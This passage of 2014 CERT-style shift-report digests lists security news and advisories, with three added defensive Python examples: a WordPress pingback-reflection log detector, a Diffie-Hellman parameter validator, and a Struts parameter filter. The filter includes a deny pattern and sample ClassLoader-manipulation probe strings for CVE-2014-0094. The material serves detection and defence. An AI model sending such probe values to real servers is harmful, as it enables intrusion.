http://blogs.technet.com/b/srd/archive/2014/03/11/when-aslr-makes-the-diffe…
*** Zeus-in-the-mobile variant uses security firm's name to gain victims' trust ***
---------------------------------------------
Android users are tricked into installing a spurious "security" app, which allows fraudsters to bypass one-time password authentication for online banking.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/uCKACIRIxoI/
*** BB10's dated crypto lets snoops squeeze the juice from your BlackBerry ***
---------------------------------------------
BEAST will attack your sensitive web traffic, warns poster
BlackBerry BB10 OS uses dated protocols that leave users at risk to known cryptographic attacks, according to a security researcher.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/12/bb10_dated_…
*** WhatsApp extends privacy settings and still remains insecure ***
---------------------------------------------
Privacy protection in WhatsApp remains leaky: although, with the latest update, other users can no longer see when you were last online in the chat, the chats can apparently be read in full by other Android apps.
---------------------------------------------
http://www.heise.de/security/meldung/WhatsApp-erweitert-Einstellungen-zur-P…
*** iOS 7.1: iBeacon indoor positioning harder to switch off ***
---------------------------------------------
After updating to Apple's latest mobile operating system, closing an app that uses indoor tracking is no longer enough: even after a device restart, iBeacon keeps on transmitting.
---------------------------------------------
http://www.heise.de/security/meldung/iOS-7-1-Innenraumortung-iBeacon-schwer…
*** Is it the ISP's Fault if Your Home Broadband Router Gets Hacked? ***
---------------------------------------------
As consumers we have a right to be huffy at our ISPs when something goes wrong. But is the Internet provider still to blame if, as in the recent cases of AAISP and now PlusNet, your home broadband router ends up being hijacked by a DNS redirection exploit?
---------------------------------------------
http://www.ispreview.co.uk/index.php/2014/03/isps-fault-home-broadband-rout…
*** Blog: Agent.btz: a source of inspiration? ***
---------------------------------------------
The past few days has seen an extensive discussion within the IT security industry about a cyberespionage campaign called Turla, aka Snake and Uroburos, which, according to G-DATA experts, may have been created by Russian special services.
---------------------------------------------
http://www.securelist.com/en/blog/8191/Agent_btz_a_source_of_inspiration
*** Yokogawa CENTUM CS 3000 Vulnerabilities ***
---------------------------------------------
Juan Vazquez of Rapid7 Inc. and independent researcher Julian Vilas Diaz have identified several buffer overflow vulnerabilities and released proof-of-concept (exploit) code for the Yokogawa CENTUM CS 3000 application. CERT/CC, NCCIC/ICS-CERT, and JPCERT have coordinated with Rapid7 and Yokogawa to mitigate these vulnerabilities.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-070-01
*** SSA-456423 (Last Update 2014-03-12): Vulnerabilities in SIMATIC S7-1500 CPU ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** VMSA-2014-0002 ***
---------------------------------------------
VMware vSphere updates to third party libraries
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0002.html
*** Apple Safari OSX code execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/91654
*** WordPress WP SlimStat Plugin URL Script Insertion Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57305
*** Bugtraq: CORE-2014-0002 - Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531418
*** Vuln: MediaWiki text Parameter HTML Injection Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/65906
*** Vuln: MediaWiki CVE-2014-2242 Cross Site Scripting Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/65910
*** [webapps] - ZyXEL Router P-660HN-T1A - Login Bypass ***
---------------------------------------------
http://www.exploit-db.com/exploits/32204
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 10-03-2014 18:00 − Tuesday 11-03-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** A clear-eyed guide to Mac OS's actual security risks ***
---------------------------------------------
Apple has improved its security in recent years, but is it enough?
---------------------------------------------
http://www.csoonline.com/article/749495/a-clear-eyed-guide-to-mac-os-s-actu…
*** CanSecWest Presenter Self-Censors Risky Critical Infrastructure Talk ***
---------------------------------------------
Researcher Eric Filiol withdrew his presentation from this week's CanSecWest conference because of concerns the information could be used to attack critical infrastructure worldwide.
---------------------------------------------
http://threatpost.com/cansecwest-presenter-self-censors-risky-critical-infr…
*** More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack ***
---------------------------------------------
Distributed Denial of Service (DDoS) attacks are becoming a common trend on our blog lately, and that's OK because it's a very serious issue for every website owner. Today I want to talk about a large DDoS attack that leveraged thousands of unsuspecting WordPress websites as indirect amplification vectors. Any WordPress site with XML-RPC enabled...
---------------------------------------------
http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-di…
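The Sucuri post above describes blogs being turned into reflectors through XML-RPC pingbacks. There are two places such an attack shows up in logs: the victim sees GETs arriving from many unrelated WordPress installs, and each abused blog sees a burst of POSTs to its own xmlrpc.php. The following is an added example for this digest, not code from the post: it scans combined-format access log lines for both views. It assumes two traits of reflected pingback fetches (assumed from how pingbacks work, not stated on the page): the abused blog fetches the victim URL with WordPress's HTTP client User-Agent, "WordPress/<version>; <blog URL>", and the attacker appends a random numeric query string so every fetch bypasses caches. All log lines in the block are constructed.

```python
"""Find WordPress pingback reflection traffic in a web server access log.

Added example for this digest, not code from the Sucuri post. Assumes the
Apache/nginx combined log format and two assumed traits of reflected pingback
fetches: WordPress's HTTP client User-Agent ("WordPress/<version>; <blog
URL>") and a random numeric query string on the victim URL. All log lines
below are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
WP_UA_RE = re.compile(r"^WordPress/[\d.]+; (?P<blog>https?://\S+)$")

# Constructed sample: the victim's log (GETs carrying a numeric query) merged
# with the log of one abused blog (POSTs to its xmlrpc.php), so both views
# of the same attack can be exercised from one string.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2014:09:01:01 +0000] "GET /?4137741 HTTP/1.0" 200 51234 "-" "WordPress/3.8; http://blog-a.example"
203.0.113.11 - - [10/Mar/2014:09:01:01 +0000] "GET /?9812733 HTTP/1.0" 200 51234 "-" "WordPress/3.7.1; http://blog-b.example"
203.0.113.10 - - [10/Mar/2014:09:01:02 +0000] "GET /?5567811 HTTP/1.0" 200 51234 "-" "WordPress/3.8; http://blog-a.example"
198.51.100.7 - - [10/Mar/2014:09:01:02 +0000] "GET /about/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Mar/2014:09:01:03 +0000] "GET /?1029384 HTTP/1.0" 200 51234 "-" "WordPress/3.8.1; http://blog-c.example"
198.51.100.8 - - [10/Mar/2014:09:01:03 +0000] "GET /feed/ HTTP/1.1" 200 4096 "-" "WordPress/3.8; http://reader.example"
192.0.2.55 - - [10/Mar/2014:09:00:58 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.55 - - [10/Mar/2014:09:00:59 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.56 - - [10/Mar/2014:09:00:59 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_pingback_reflection(rec):
    """Victim side: a GET from WordPress's HTTP client whose whole query
    string is a cache-busting number. A WordPress install fetching /feed/
    without one is ordinary blog-to-blog traffic and is not flagged."""
    if rec["method"] != "GET" or not WP_UA_RE.match(rec["ua"]):
        return False
    return urlsplit(rec["path"]).query.isdigit()


def reflecting_sources(log_text):
    """Victim side: {reflector IP: (hits, blog URL the User-Agent advertises)}.
    The blog URL is what you quote when telling the owner their site is abused."""
    hits, blogs = Counter(), {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_pingback_reflection(rec):
            hits[rec["ip"]] += 1
            blogs[rec["ip"]] = WP_UA_RE.match(rec["ua"]).group("blog")
    return {ip: (n, blogs[ip]) for ip, n in hits.items()}


def xmlrpc_posters(log_text):
    """Reflector side: who is POSTing to your own /xmlrpc.php, and how often.
    A burst from a few sources you do not recognise is the sign that your
    site is being used as an amplifier."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and urlsplit(rec["path"]).path == "/xmlrpc.php":
            hits[rec["ip"]] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, (n, blog) in sorted(reflecting_sources(SAMPLE_LOG).items()):
        print("reflector     %-14s hits=%d blog=%s" % (ip, n, blog))
    for ip, n in sorted(xmlrpc_posters(SAMPLE_LOG).items()):
        print("xmlrpc poster %-14s posts=%d" % (ip, n))
```

Feed a real log through `reflecting_sources` and the blog URLs it returns are the abuse contacts; feed your own log through `xmlrpc_posters` to learn whether you are one of them.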
*** Can this $70 dongle stem the epidemic of password breaches? ***
---------------------------------------------
Maybe not, but its approach could improve the security of password databases.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/TIJ7a8DsSVY/
*** Careto and OS X Obfuscation ***
---------------------------------------------
Last month, security researchers released a report about a targeted attack operation which they named Careto, or Mask in Spanish. The attack was noted for encoding its configuration data and encrypting its network traffic, making analysis more difficult. However, the capabilities of the Mac malware used in Careto were not as sophisticated as its Windows...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/tLQMNa8HgFc/
*** Saboteurs slip Dendroid RAT into Google Play ***
---------------------------------------------
Google quickly removed the malware, which was reportedly disguised as a legitimate parental control app, from its marketplace.
---------------------------------------------
http://www.scmagazine.com/saboteurs-slip-dendroid-rat-into-google-play/arti…
*** A third of all certificate issuers are nothing but security dead weight ***
---------------------------------------------
In a study of 48 million SSL certificates, researchers found that one in three issuers has never issued a single HTTPS certificate. These dormant CAs are a considerable security risk that could easily be defused.
---------------------------------------------
http://www.heise.de/security/meldung/Ein-Drittel-aller-Zertifikats-Herausge…
*** Download: Threat Report ***
---------------------------------------------
Our Threat Report covering the second half of 2013 (with some forecasting of 2014) was released last week. You'll find it, and all of our previous reports, in the Labs section of f-secure.com. (Posted 10/03/14 at 06:24 PM)
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002681.html
*** Encryption: Snowden recommends TextSecure and RedPhone ***
---------------------------------------------
In the SXSW discussion, Edward Snowden praised Open Whisper Systems and its developer Moxie Marlinspike for releasing easy-to-use encryption tools.
---------------------------------------------
http://www.golem.de/news/verschluesselung-snowden-empfiehlt-textsecure-und-…
*** iOS 7.1: Apple patches numerous security holes ***
---------------------------------------------
With its latest update Apple fixes more than two dozen bugs, some of them critical, in its mobile operating system. A jailbreak is no longer possible.
---------------------------------------------
http://www.heise.de/security/meldung/iOS-7-1-Apple-stopft-zahlreiche-Sicher…
*** Team Cymru's SOHO Pharming Whitepaper ***
---------------------------------------------
UPDATE: Here is the video for our SOHO Pharming Update of March 11, 2014. This update discusses the results of our SOHO Pharming Whitepaper release as well as further developments on that topic. If you've navigated to this site from an external source and are seeking the download of the SOHO Pharming Whitepaper, please scroll down on this page. Thanks for watching and feel free to share with your colleagues and friends!
---------------------------------------------
https://www.team-cymru.com/ReadingRoom/Whitepapers/SOHOPharming.html
*** Microsoft Security Bulletin Summary for March 2014 ***
---------------------------------------------
This bulletin summary lists security bulletins released for March 2014.
With the release of the security bulletins for March 2014, this bulletin summary replaces the bulletin advance notification originally issued March 6, 2014.
---------------------------------------------
http://technet.microsoft.com/en-us/security/bulletin/ms14-mar
*** Security updates available for Adobe Flash Player ***
---------------------------------------------
Adobe has released security updates for Adobe Flash Player 12.0.0.70 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.341 and earlier versions for Linux. These updates address important vulnerabilities, and Adobe recommends users update their product installations to the latest versions: ...
---------------------------------------------
http://helpx.adobe.com/security/products/flash-player/apsb14-08.html
*** TA14-069A: Microsoft Ending Support for Windows XP and Office 2003 ***
---------------------------------------------
Original release date: March 10, 2014. Systems Affected: Microsoft Windows XP with Service Pack 3 (SP3) operating system; Microsoft Office 2003 products. Overview: Microsoft is ending support for the Windows XP operating system and Office 2003 product line on April 8, 2014. [1] After this date, these products will no longer receive: security patches which help protect PCs from harmful viruses, spyware, and other malicious software; assisted technical support from Microsoft; software and content updates...
---------------------------------------------
https://www.us-cert.gov/ncas/alerts/TA14-069A-0
*** Asterisk - Multiple Vulnerabilities ***
---------------------------------------------
Asterisk PJSIP Channel Driver Bug Lets Remote Users Deny Service
Asterisk chan_sip File Descriptor Flaw Lets Remote Authenticated Users Deny Service
Asterisk HTTP Header Cookie Processing Overflow Lets Remote Users Deny Service
Asterisk PJSIP Channel Driver Subscription Handling Bug Lets Remote Users Deny Service
---------------------------------------------
http://www.securitytracker.com/id/1029892
http://www.securitytracker.com/id/1029891
http://www.securitytracker.com/id/1029890
http://www.securitytracker.com/id/1029893
*** FreeType Buffer Overflow in CFF Driver Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1029895
*** D-Link DIR-600 Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57304
*** D-Link DSL-2640U Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57269
*** Bugtraq: Android Vulnerability: Install App Without User Explicit Consent ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531394
*** IBM Security Bulletin: IBM SPSS SamplePower vsflex8l ActiveX Control ComboList Property Remote Code Execution Vulnerability (CVE-2014-0895) ***
---------------------------------------------
There is a security vulnerability in an ActiveX control shipped with IBM SPSS SamplePower Version 3.0.1. It is corrected in the IBM SPSS SamplePower product interim fix. CVE(s): CVE-2014-0895. Affected product(s) and version(s): IBM SPSS SamplePower for Windows V3.0.1. Refer to the following reference URLs for remediation and additional vulnerability details. Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21666790 X-Force Database:
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** IBM Security Bulletin: Download of Code Without Integrity Check vulnerability in IBM Security AppScan Standard (CVE-2014-0904) ***
---------------------------------------------
IBM Security AppScan Standard can be affected by a vulnerability in the update process that could allow remote code injection. CVE(s): CVE-2014-0904. Affected product(s) and version(s): IBM Security AppScan Standard 8.8, 8.7 and 8.6; IBM Rational AppScan Standard 8.5, 8.0 and 7.9. Refer to the following reference URLs for remediation and additional vulnerability details:
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** HPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability ***
---------------------------------------------
Potential vulnerabilities have been identified with HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBMU02947 rev.1 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Disclosure of Information and Cross-Site Request Forgery (CSRF) ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in disclosure of information or cross-site request forgery (CSRF).
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBMU02948 rev.1 - HP Systems Insight Manager (SIM) Running on Linux and Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS), Disclosure of Information ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Systems Insight Manager (SIM) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in execution of arbitrary code, Denial of Service (DoS), or disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBUX02976 SSRT101236 rev.1 - HP-UX Running NFS rpc.lockd, Remote Denial of Service (DoS) ***
---------------------------------------------
A potential security vulnerability has been identified with HP-UX running NFS rpc.lockd. The vulnerability could be exploited remotely to create a Denial of Service (DoS).
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 07-03-2014 18:00 − Monday 10-03-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Experts analyze Snake, Uroburos malware samples dating back to 2006 ***
---------------------------------------------
Researchers with BAE Systems Applied Intelligence have determined that a possibly Russian-fueled malware campaign known as Snake, or Uroburos, may actually date back as far as 2006.
---------------------------------------------
http://www.scmagazine.com/experts-analyze-snake-uroburos-malware-samples-da…
*** SSL encryption problematic in iOS apps too ***
---------------------------------------------
Not only Android apps: in the iPhone universe, too, the data connections of apps quite often turn out to be attackable. A research team was able to trick around 14 percent of the iOS apps that use SSL.
---------------------------------------------
http://www.heise.de/newsticker/meldung/SSL-Verschluesselung-auch-in-iOS-App…
*** iOS Security ***
---------------------------------------------
iOS is designed with comprehensive security that offers enterprise-grade protection of corporate data. Learn more about the advanced security features of iOS in this security guide.
---------------------------------------------
https://ssl.apple.com/iphone/business/docs/iOS_Security_Feb14.pdf
*** ETH40G: encryption at 40 gigabits per second ***
---------------------------------------------
With the ETH40G from the SITLine series, Rohde & Schwarz promises a high encrypted data throughput of 40 gigabits per second in broadband networks.
---------------------------------------------
http://www.golem.de/news/eth40g-verschluesselung-mit-40-gigabit-pro-sekunde…
*** Linux kernel IPv6 crash due to router advertisement flooding ***
---------------------------------------------
Risk: Medium. The Linux kernel is vulnerable to a crash on hosts that accept router advertisements. An unlimited number of routes can be cre...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030061
*** OpenVZ update for kernel ***
---------------------------------------------
OpenVZ has issued an update for the kernel. This fixes a weakness and a vulnerability, which can be exploited by malicious, local users in a guest virtual machine to potentially disclose sensitive information and by malicious, local users to cause a DoS (Denial of Service).
---------------------------------------------
https://secunia.com/advisories/57300
*** FFmpeg Multiple Vulnerabilities ***
---------------------------------------------
Some vulnerabilities have been reported in FFmpeg, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise an application using the library.
---------------------------------------------
https://secunia.com/advisories/56866
*** Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition. ***
---------------------------------------------
Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition. CVE(s): CVE-2014-0428, CVE-2014-0422, CVE-2013-5907, CVE-2014-0415, CVE-2014-0410, CVE-2013-5889, CVE-2014-0417, CVE-2014-0387, CVE-2014-0424, CVE-2013-5878, CVE-2014-0373, CVE-2014-0375, CVE-2014-0403, CVE-2014-0423, CVE-2014-0376, CVE-2013-5910, CVE-2013-5884, CVE-2013-5896, CVE-2013-5899, CVE-2014-0416, CVE-2013-5887, CVE-2014-0368, CVE-2013-5888, CVE-2013-5898 and CVE-2014-0411 Affected product(s)
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/multiple_vulnerabilit…
*** Vuln: PHP Fileinfo Component Out of Bounds Memory Corruption Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/66002
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 06-03-2014 18:00 − Friday 07-03-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** The Snake Campaign ***
---------------------------------------------
This new report from BAE Systems Applied Intelligence provides further details on how the recently disclosed 'Snake' cyber espionage toolkit operates. Timelines of the malware development show this to be a much bigger campaign than previously known. Specifically, it reveals that the malware has actually been in development since at least 2005. From the complexity of the malware, and the range of variants and techniques used to support its operation, the research also suggests that
---------------------------------------------
http://www.baesystems.com/what-we-do-rai/the-snake-campaign
*** Diffie-Hellman: nonsensical crypto parameters ***
---------------------------------------------
A short key exchange crashes Chrome, and other browsers accept completely nonsensical parameters for a Diffie-Hellman key exchange. In connection with the recently discovered TLS problems this could be a security risk. (Opera, Firefox)
---------------------------------------------
http://www.golem.de/news/diffie-hellman-unsinnige-krypto-parameter-1403-104…
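The item above is about clients that swallow whatever Diffie-Hellman values a server sends. The checks a client can run on the parameters it receives in ServerKeyExchange are cheap: the modulus p must be long enough, odd and (probably) prime, and both the generator g and the server's public value must lie in [2, p-2], since 0, 1 and p-1 pin the shared secret to a value anyone can compute. The following is an added example for this digest, not code from any browser or from the article. The 2048-bit floor, the 32 random Miller-Rabin bases and the use of Mersenne primes as test moduli are choices made for this example, not requirements stated on the page.

```python
"""Sanity-check Diffie-Hellman parameters before accepting a key exchange.

Added example for this digest, not code from any browser or from the golem.de
article. A TLS client sees p, g and the server's public value Ys in
ServerKeyExchange and can reject junk before doing any arithmetic with it.
Assumptions made for this example: a 2048-bit floor for p, 32 random
Miller-Rabin bases on top of fixed small ones, Mersenne primes as test values.
"""
import random

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rounds=32):
    """Miller-Rabin: trial division by small primes, then the small primes
    plus `rounds` random bases as witnesses. A composite survives each base
    with probability at most 1/4, so 44 bases make a false pass negligible."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    rng = random.Random(0xD1FF1E)  # fixed seed keeps the verdict reproducible
    bases = list(SMALL_PRIMES) + [rng.randrange(2, n - 1) for _ in range(rounds)]
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # no square reached -1: a is a witness, n is composite
    return True


def validate_dh_params(p, g, ys, min_bits=2048):
    """Return (ok, reason). Rejects a modulus that is too short, even or
    composite, a generator outside [2, p-2] (1 and p-1 generate trivial
    subgroups) and a peer public value outside [2, p-2] (0, 1 and p-1 force
    the shared secret to a value the network can predict)."""
    if p.bit_length() < min_bits:
        return False, "p is only %d bits, below the %d-bit floor" % (p.bit_length(), min_bits)
    if p % 2 == 0:
        return False, "p is even"
    if not is_probable_prime(p):
        return False, "p is not prime"
    if not 2 <= g <= p - 2:
        return False, "g outside [2, p-2]"
    if not 2 <= ys <= p - 2:
        return False, "peer public value outside [2, p-2]"
    return True, "ok"


if __name__ == "__main__":
    M127 = 2 ** 127 - 1  # Mersenne prime, stands in for a real group modulus
    cases = ((M127, 2, 5, 127), (M127, 2, 5, 2048), (2 ** 64 + 1, 2, 5, 64), (M127, 2, 1, 127))
    for p, g, ys, bits in cases:
        print(p.bit_length(), validate_dh_params(p, g, ys, min_bits=bits))
```

The composite 2^64 + 1 in the demo is worth noting: it passes Miller-Rabin to base 2, so a check that relied on a single fixed base would accept it; the extra bases reject it. A client that applies these checks and then refuses the handshake is also immune to the crash the article mentions, because the tiny modulus never reaches the arithmetic.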
*** Shedding New Light on Tor-Based Malware ***
---------------------------------------------
Researchers at Kaspersky Lab and Microsoft have shared new insight into how malware campaigns operate over the Tor anonymity network, as well as other darknets.
---------------------------------------------
http://threatpost.com/shedding-new-light-on-tor-based-malware/104651
*** EMC Documentum TaskSpace privilege escalation ***
---------------------------------------------
EMC Documentum TaskSpace could allow a remote attacker to gain elevated privileges on the system, caused by an error related to the way dm_world group users were added to the dm_superusers_dynamic group. An attacker could exploit this vulnerability to gain elevated privileges on the system.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/91600
*** Multiple Cisco Wireless LAN Controllers WebAuth denial of service ***
---------------------------------------------
Multiple Cisco Wireless LAN Controllers are vulnerable to a denial of service, caused by the failure to deallocate memory used during the processing of a WebAuth login. By creating an overly large number of WebAuth requests, an attacker could exploit this vulnerability to cause the device to reboot.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/91602
*** New Tool Makes Android Malware Easier To Create ***
---------------------------------------------
itwbennett writes: "A new commercial tool designed to allow cybercriminals to easily transform legitimate Android applications into malicious software has hit the underground market, paving the way for cheap and easy development of sophisticated Android malware. Security researchers from Symantec said Wednesday in a blog post that the tool, called Dendroid, is marketed by its creators as an Android remote administration tool (RAT) and is being sold for $300."
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/lUI1_mGPycM/story01.htm
*** The Siesta Campaign: A New Targeted Attack Awakens ***
---------------------------------------------
In the past few weeks, we have received several reports of targeted attacks that exploited various application vulnerabilities to infiltrate various organizations. Similar to the Safe Campaign, the campaigns we noted went seemingly unnoticed and under the radar. The attackers orchestrating the campaign we call the Siesta Campaign used multicomponent malware to target certain institutions that […]
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/-rYSWuRUzdQ/
*** Gameover trojan uses rootkit to remain stealthy, tougher to remove ***
---------------------------------------------
Researchers have discovered a Gameover variant of the Zeus trojan that has been modified to include the Necurs rootkit, which makes the malware tougher to detect and remove by protecting files on the disk and memory.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/F6bJXyUofvI/
*** Apache Struts Bugs Let Remote Users Deny Service and Manipulate the ClassLoader ***
---------------------------------------------
A remote user can supply specially crafted 'class' parameter values to the ParametersInterceptor class to manipulate the ClassLoader [CVE-2014-0094].
A remote user can send a multipart request with a specially crafted Content-Type header to trigger a flaw in the Apache Commons FileUpload component and cause denial of service conditions [CVE-2014-0050].
---------------------------------------------
http://www.securitytracker.com/id/1029876
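The first of the two Struts bugs above is a parameter-name problem: ParametersInterceptor treats each request parameter name as an OGNL property path and sets it on the action, so a name whose first segment is `class` steps onto the action's `getClass()` and from there onto its ClassLoader. The following is an added example for this digest, not Apache Struts code: a screen for such parameter names that can sit in a WAF rule, a servlet filter or a log review. The deny rule (case-insensitive `class` as the first segment, in dotted or bracketed form) and the allow-list for ordinary field names are this example's own choices, not the project's `excludeParams` pattern; the sample requests are constructed, and what a value would do once past the interceptor is out of scope.

```python
"""Screen request parameter names that try to reach the ClassLoader through
Struts 2's ParametersInterceptor (the CVE-2014-0094 pattern).

Added example for this digest, not Apache Struts code. The deny rule and the
allow-list below are this example's choices, not the project's excludeParams
pattern. Sample requests are constructed.
"""
import re
from urllib.parse import parse_qsl

# First OGNL segment is "class", spelled in any case, followed by a dot or an
# index bracket: that is the step onto getClass().
DENY_NAME_RE = re.compile(r"^\s*class\s*(\.|\[)", re.IGNORECASE)
# Plain form fields: identifier segments joined by dots, optional numeric index.
ALLOW_NAME_RE = re.compile(
    r"^[A-Za-z_][A-Za-z0-9_]*(\[\d+\])?(\.[A-Za-z_][A-Za-z0-9_]*(\[\d+\])?)*$"
)

SAMPLE_REQUESTS = {
    "normal": "user=alice&address.city=Vienna&items[0].qty=2",
    "probe": "user=alice&class.classLoader.x=1",
    "probe_case": "Class.ClassLoader.y=2&user=bob",
    "probe_index": "class%5B%27classLoader%27%5D.z=3",  # decodes to class['classLoader'].z
    "lookalike": "classroom.name=1a",                    # "class" is not a segment here
}


def classloader_probes(raw_query):
    """Decoded (name, value) pairs whose name hits the deny rule."""
    return [(k, v) for k, v in parse_qsl(raw_query, keep_blank_values=True)
            if DENY_NAME_RE.match(k)]


def is_classloader_probe(raw_query):
    return bool(classloader_probes(raw_query))


def filter_params(raw_query):
    """What an action should receive: allow-listed names minus the deny rule.
    The allow-list alone would still pass "class.classLoader.x" (it is a
    valid dotted path), which is why the deny rule stays; the allow-list
    alone already drops bracket-and-quote spellings the deny rule might miss."""
    return [(k, v) for k, v in parse_qsl(raw_query, keep_blank_values=True)
            if ALLOW_NAME_RE.match(k) and not DENY_NAME_RE.match(k)]


if __name__ == "__main__":
    for label, q in SAMPLE_REQUESTS.items():
        print("%-12s probe=%-5s passed=%s" % (label, is_classloader_probe(q), filter_params(q)))
```

Use `is_classloader_probe` on the raw query string or form body for alerting, and `filter_params` where you control which parameters reach the application. The point of keeping both an allow-list and a deny rule is that each covers a spelling the other does not.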
*** Linux Memory Dump with Rekall, (Fri, Mar 7th) ***
---------------------------------------------
Memory dumping for incident response is nothing new, but ever since they locked down access to direct memory (/dev/mem) on Linux, I've had bad experiences dumping memory. I usually end up crashing the server about 60 percent of the time while collecting data with Fmem. A new version of the Linux memory dumping utility rekall (previously called Winpmem) has recently come out. I've been testing it on the latest versions of Ubuntu and Redhat EL 5 and have not run into any issues with
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17775&rss
*** Citrix NetScaler Application Delivery Controller Multiple Flaws Let Users Gain Elevated Privileges and Deny Service ***
---------------------------------------------
Several vulnerabilities were reported in Citrix NetScaler Application Delivery Controller. A local user can obtain passwords. A user can gain elevated privileges. A remote user can conduct cross-site scripting and cross-site request forgery attacks. A user can cause denial of service conditions.
---------------------------------------------
http://www.securitytracker.com/id/1029880
*** February 2014 virus activity review from Doctor Web ***
---------------------------------------------
February 28, 2014. Although it's the year's shortest month, February proved to be quite eventful in terms of information security. In particular, Doctor Web's security researchers discovered several Trojans that replace browser window banners and steal confidential information. Also identified were new malicious programs targeting Android. Viruses: According to statistics collected in February 2014 by Dr.Web CureIt!, Trojan.Packed.24524, which spreads in the guise of legitimate software, was
---------------------------------------------
http://news.drweb.com/show/?i=4262&lng=en&c=9
*** ownCloud 4.0.x / 4.5.x Remote Code Execution ***
---------------------------------------------
Risk: High. Vulnerability title: Remote Code Execution in ownCloud. CVE: CVE-2014-2044. Vendor: ownCloud. Product: ownCloud. Affected versi...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030055
*** WordPress Premium Gallery Manager Shell Upload ***
---------------------------------------------
Risk: High. WordPress plugin Premium Gallery Manager arbitrary file upload ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030053
